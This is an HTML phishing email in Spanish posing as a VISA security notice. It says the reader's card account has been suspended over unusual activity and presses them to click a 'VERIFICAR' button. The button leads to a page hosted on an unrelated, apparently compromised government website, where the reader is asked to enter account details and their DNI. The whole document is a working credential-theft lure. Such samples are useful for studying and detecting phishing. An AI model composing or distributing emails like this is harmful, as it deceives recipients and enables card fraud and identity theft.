<html>
  <body style="font-family: Helvetica, Arial, sans, serif, EmojiFont;
    color: rgb(34, 31, 31);">
    <div style="width:940px; margin-left:auto; margin-right:auto">
      <center><img src="https://i.ibb.co/kHHwPk9/skt.jpg"></center>

      <h4 style="text-transform:none; color:black;"></h2>

      <hr>

      <b>Estimado Cliente:</b>

      <div style="margin-left:10px">
        <p style="font-size:14px;">La division de seguridad VISA, la cual esta constantemente trabajando para garantizar su seguridad y la de nuestros socios, ha detectado una actividad inusual con sus tarjetas VISA.</p>
        <p style="font-size:14px;">Esto puede deberse a que hubo un acceso a su cuenta a traves de una direccion de IP diferente a la habitual, un lugar publico, una red wifi publica o un acceso no autorizado.</p>
		<p style="font-size:14px;">Como medida de seguridad suspendimos momentaneamente su cuenta, hasta resolver nuestra inquietud. Usted podra ingresar a su cuenta normalmente pero podra tener problemas para los pagos en linea, es decir cualquier transaccion que no involucre su tarjeta fisica no podra ser realizada.</p>
        <p style="font-size:14px;">Para solucionar esto le solicitamos que se dirija a nuestro sistema de verificacion y complete los datos requeridos para que su cuenta quede activa lo antes posible, tenga en mano su DNI ya que se le podra solicitar en el mismo.</p>
        <p style="font-size:14px;">Si toda la informacion corresponde a su cuenta, sera redirigido automaticamente a la pagina de VISA y su cuenta restablecida en el acto</p>
	    <center>  
		<p style="font-size:14px;">Ingrese a su cuenta y actualice su informacion.
		<center>
	    
	  </div>
        <hr>
         <a href="http://bpbd.ciamiskab.go.id/wp-content/socios/sitio/index.htm" style="border-radius:5px; background:#D3D3D3; padding: 5px 10px; color:black; text-decoration:underline; font-weight:bold; text-transform:uppercase;">VERIFICAR</a>  

      <div style="margin-top:25px; margin-bottom:25px;">
                
      </div>

      <p style="font-size:14px;">Para mayor información o sugerencias sobre el servicio comuníquese al (011) 5371-3409 las 24 horas todos los días. </p>

      <hr>

      <small style="color:blue text-transform:none; ">
                       Gracias por utilizar el Servicio de Mensajes Visa.
      </small>


    </div>
  </body>
</html>